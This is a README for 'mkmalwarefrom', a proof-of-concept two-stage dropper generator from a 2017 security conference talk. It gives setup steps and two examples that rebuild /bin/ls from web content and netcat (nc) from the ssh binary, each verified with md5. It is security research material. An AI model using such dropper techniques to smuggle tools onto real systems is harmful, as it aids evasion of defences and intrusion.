mkmalwarefrom is a proof-of-concept two-stage dropper generator. It was released as part of the Malwares From Thin Bits talk given at BSidesDFW 2017 conference by Itzik Kotler from SafeBreach Labs.
Slides are availble here
0.1.0
mkmalwarefrom requires Python and was tested with Python 2.7.13.
$ git clone https://github.com/SafeBreach-Labs/mkmalwarefrom.git
$ cd mkmalwarefrom
$ python mkmalwarefrom.py -h
# assume mkmalwarefrom root directory
$ cat /bin/ls | ./mkmalwarefrom.py -1 http://www.yahoo.com > download_ls.py
$ python download_ls.py > ls2
$ md5 /bin/ls ls2
# assume mkmalwarefrom root directory
$ cat /usr/bin/nc | ./mkmalwarefrom.py -2 /usr/bin/ssh > mk_nc.py
$ python mk_nc.py > nc2
$ md5 /usr/bin/nc nc2
BSD 3-Clause